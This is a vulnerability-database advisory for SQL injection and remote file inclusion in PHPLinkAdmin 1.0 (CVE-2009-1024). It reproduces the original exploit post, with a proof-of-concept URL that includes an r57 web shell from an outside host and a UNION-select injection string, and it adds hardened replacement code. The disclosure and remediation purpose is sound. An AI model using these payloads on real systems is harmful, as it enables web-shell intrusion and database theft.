Beerwin's PhpLinkAdmin 'edlink.php' and Other Unspecified Vectors SQL Injection Vulnerability

Vulnerability ID 1117475 Vulnerability type SQL injection
Published 2009-03-16 Updated 2009-03-26
CVE ID CVE-2009-1024 CNNVD ID CNNVD-200903-343
Platform PHP CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/8216
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-343
|Vulnerability details
Multiple SQL injection vulnerabilities exist in Beerwin PHPLinkAdmin 1.0. Remote attackers can execute arbitrary SQL commands via the linkid parameter to edlink.php and other unspecified vectors.
|Vulnerability EXP
#######################################################################################################################
[+] Beerwin's PHPLinkAdmin 1.0 Remote File Inclusion/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#######################################################################################################################

[+] Download : http://www.downloads.beerwin.com/index.php?p=showdl&dl=16&cat=18

[+] Remote File Inclusion

 Direct access to linkadmin. No auth.

 Vulnerable code in linkadmin.php :

-------------------------------------------------------------------------------------------
$page = $_REQUEST['page'];
if (!$page){
    echo "Welcome to the PHPLINKADMIN!.<br> Please select an action from the left menu.";
}else{
    include $page;   // unvalidated request value reaches include (RFI/LFI sink)
}
--------------------------------------------------------------------------------------------

 PoC :

   http://127.0.0.1/path/linkadmin.php?page=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt?

========================================================================================================================

[+] Remote SQL Injection

  There are a lot of SQL injection vulnerabilities in the script. I will present only one.

  Vulnerable code in edlink.php :

-----------------------------------------------------------------------------------------------
$linkid=$_REQUEST['linkid'];
if (!$linkid){
  echo "Error: Link missing! <br />";
}else{
  // $linkid is concatenated straight into the query string (SQL injection sink)
  $sql=mysql_query("SELECT * FROM linktable WHERE linkid='$linkid'") or die(mysql_error());
-----------------------------------------------------------------------------------------------

 PoC :

   http://127.0.0.1/path/edlink.php?linkid=-1' union all select 1,2,3,4,concat_ws(0x3a,user(),database(),version())'--

 No important things to extract from the database.

=========================================================================================================================


#######################################################################################################################

# milw0rm.com [2009-03-16]
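The two snippets quoted in the advisory share one root cause: a request parameter reaches a sensitive sink (`include` in linkadmin.php, a string-built query in edlink.php) without validation. The block below is an added example written for this page, not code from PHPLinkAdmin or from the advisory's author. It shows hardened counterparts of both snippets: the page name is mapped through a fixed allowlist instead of being included directly, and `linkid` is validated as an integer and bound as a prepared-statement parameter. It assumes a PDO connection in `$pdo`, that `linktable.linkid` is an integer column, and the page names `links` and `addlink` are hypothetical.

```php
<?php
// Added example: hardened versions of the linkadmin.php and edlink.php
// snippets from the advisory. Not PHPLinkAdmin's own code.
// Assumptions: $pdo is an open PDO connection; linktable.linkid is INT;
// the page names below are hypothetical.

// ---- linkadmin.php: include only files from a fixed allowlist ----------
// The request value is used as a *key*, never as a path, so neither remote
// URLs nor ../ traversal can reach include().
$allowedPages = [
    'links'   => __DIR__ . '/pages/links.php',    // hypothetical
    'addlink' => __DIR__ . '/pages/addlink.php',  // hypothetical
];

$page = $_REQUEST['page'] ?? '';
if ($page === '') {
    echo "Welcome to the PHPLINKADMIN!<br> Please select an action from the left menu.";
} elseif (array_key_exists($page, $allowedPages)) {
    include $allowedPages[$page];
} else {
    http_response_code(400);
    echo "Unknown page.";
}

// ---- edlink.php: validate the type, then bind as a parameter ------------
// FILTER_VALIDATE_INT rejects anything that is not a plain integer, so the
// "-1' union all select ..." payload never gets past this line. Even if a
// non-integer column were used, the bound parameter would keep it as data.
$linkid = filter_var($_REQUEST['linkid'] ?? '', FILTER_VALIDATE_INT);
if ($linkid === false) {
    echo "Error: Link missing! <br />";
} else {
    $stmt = $pdo->prepare('SELECT * FROM linktable WHERE linkid = :linkid');
    $stmt->bindValue(':linkid', $linkid, PDO::PARAM_INT);
    $stmt->execute();
    $link = $stmt->fetch(PDO::FETCH_ASSOC);  // false when no such link
}
```

The allowlist also fixes the "No auth" observation indirectly only in that unknown pages are refused; an authentication check before the include is still required and is out of scope of this snippet. With `allow_url_include` and `allow_url_fopen` disabled in php.ini the remote-include variant is blocked at the interpreter level as well, but the allowlist is what stops the local traversal case.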
|References

Source: XF
Name: phplinkadmin-edlink-sql-injection(49265)
Link: http://xforce.iss.net/xforce/xfdb/49265
Source: VUPEN
Name: ADV-2009-0733
Link: http://www.vupen.com/english/advisories/2009/0733
Source: BID
Name: 34129
Link: http://www.securityfocus.com/bid/34129
Source: MILW0RM
Name: 8216
Link: http://www.milw0rm.com/exploits/8216
Source: SECUNIA
Name: 34323
Link: http://secunia.com/advisories/34323
Source: OSVDB
Name: 52779
Link: http://osvdb.org/52779